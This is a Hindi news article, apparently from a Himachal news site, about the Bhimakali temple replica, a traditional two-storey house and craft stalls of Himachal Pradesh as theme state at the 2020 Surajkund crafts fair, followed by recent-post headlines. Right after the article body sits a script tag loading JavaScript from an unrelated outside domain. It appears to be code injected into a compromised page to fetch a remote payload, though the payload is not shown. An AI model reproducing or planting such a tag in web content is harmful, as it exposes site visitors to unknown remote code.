Categories: हिमाचल

सूरजकुंड में भीमाकाली मंदिर की ओर आकर्षित हो रहे पर्यटक

<p>सूरजकुंड में 34वें अंतरराष्ट्रीय शिल्प मेले में थीम स्टेट हिमाचल प्रदेश द्वारा मेला मैदान में बनाए गई भीमाकाली मंदिर की प्रतिकृति पर्यटकों के लिए विशेष आकर्षण बन गई है। पारंपरिक शैली में बनाए गये इस मंदिर को देखने बड़ी संख्या में पर्यटक उमड़ रहे हैं। साल 2020 के इस अंतर्राष्ट्रीय शिल्प मेले में भीमाकाली मंदिर की प्रतिकृति को स्थायी तौर पर बनाया गया है। इससे पहले हिमाचल प्रदेश 1996 में थीम राज्य बना था और महेश्वर देवता मंदिर की स्थाई प्रतिकृति बनाई गई थी।</p>

<p>इसके अतिरिक्त हिमाचल के दर्शन करवाते 5 अस्थायी द्वार भी मेला मैदान में बनाए गए हैं। इनमें एक स्थाई द्वार हिमाचल प्रदेश की पारंपरिक शैली में बनाया गया है। थीम स्टेट हिमाचल प्रदेश ने &lsquo;अपना घर&rsquo; भी बनाया है। इसे देखने लोग भारी संख्या में उमड़ रहे हैं। पारम्परिक पहाड़ी शैली में बनाये गये दो मंजिला &lsquo;अपना घर&rsquo; में जिला चंबा से एक परिवार को ठहराया गया है जो पर्यटकों को ग्रामीण संस्कृति, रहन-सहन व जीवन शैली का अनुभव करा रहा है।</p>

<p>इसके अलावा हिमाचल के हथकरघा-हस्तशिल्प औऱ अन्य हिमाचली उत्पादों के स्टालों पर प्रदर्शित उत्पादों को भी खूब पसंद किया जा रहा है। मेला मैदान में हिमाचल प्रदेश की विभिन्नता भरी संस्कृति को दर्शाते सांस्कृतिक कार्यक्रम प्रस्तुत किए जा रहे हैं। मेला मैदान की विभिन्न जगहों पर हिमाचली लोक गीत और नृत्य, पर्यटकों के आकर्षण का केंद्र बन रहे हैं। पर्यटकों को राज्य के खूबसूरत पर्यटन स्थलों की ओर आकर्षित करने और अन्य जानकारी प्रदान करने के लिए स्थापित सूचना केंद्र में काफी संख्या में पर्यटक पहुंच रहे हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

Himachal: पठियार में सार्वजनिक पुस्तकालय और खेल मैदान जल्‍द : आरएस बाली

मुख्‍य बिंदु  आर.एस. बाली ने नगरोटा के पठियार में दशहरा उत्सव के मुख्य अतिथि के…

7 hours ago

4% डीए और 75 वर्ष से अधिक पेंशनर्स को एरियर देने पर महासंघ ने मुख्यमंत्री का जताया आभार

Himachal pensioners arrears announcement: हिमाचल प्रदेश अराजपत्रित कर्मचारी महासंघ के अध्यक्ष प्रदीप ठाकुर और महासचिव…

7 hours ago

Himachal: आर.एस बाली ने परिवार सहित श्री चामुंडा मंदिर में माथा टेका और पूर्णाहुति डाली

R.S Bali Chamunda Temple visit:  हिमाचल प्रदेश पर्यटन विकास निगम के अध्यक्ष और पर्यटन विकास…

7 hours ago

आर.एस बाली ने स्वर्गीय राकेश चौधरी के परिवार को बढ़ाया ढांढस

R.S Bali expresses condolences; हिमाचल प्रदेश पर्यटन विकास निगम के अध्यक्ष  कैबिनेट रैंक आरएसा बाली ने…

8 hours ago

रावण का दहन, मुख्यमंत्री सुक्खू ने दिया सौहार्द और विकास का संदेश

  Dussehra: हिमाचल में दशहरा हर्षोल्‍लास के साथ मनाया गया। शिमला सहित सोलन, मंडी, कांगड़ा,…

8 hours ago

खाटू श्याम धाम के लिए एचआरटीसी बस सेवा नवंबर से फिर शुरू

HRTC bus to Khatu Shyam: प्रसिद्ध खाटू श्याम धाम को जाने वाली प्रदेश की एकमात्र…

8 hours ago